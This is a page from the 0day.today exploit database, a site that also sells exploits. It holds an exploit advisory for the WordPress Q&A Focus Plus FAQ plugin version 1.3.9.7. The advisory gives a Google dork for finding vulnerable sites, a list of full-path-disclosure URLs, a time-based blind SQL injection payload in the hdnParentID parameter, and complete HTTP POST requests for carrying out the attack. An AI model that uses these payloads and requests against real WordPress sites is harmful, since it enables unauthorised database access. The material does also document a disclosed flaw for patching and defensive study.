0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Q&A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection # Google Dork: inurl:"wp-content/plugins/q-and-a" # Date: 12-05-2016 # Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/ # Version: 1.3.9.7 and prior # Exploit Author: Gwendal Le Coguic # Website: http://10degres.net # Category: webapps Create a powerful and easy to use FAQ & knowledge base on your WordPress site. A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site. The plugin was originally named "Q and A FAQ" and developped by Raygun company then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations. ##### Full Path Disclosure ##### http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php ##### SQL Injection ##### Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them. Paramater hdnParentID is vulnerable in two places. Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb) 1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']... POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1 Host: [target] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 165 btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0 2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ... POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1 Host: [target] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 84 btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0 ##### References ##### https://www.owasp.org/index.php/Full_Path_Disclosure https://www.owasp.org/index.php/SQL_Injection # 0day.today [2024-12-25] #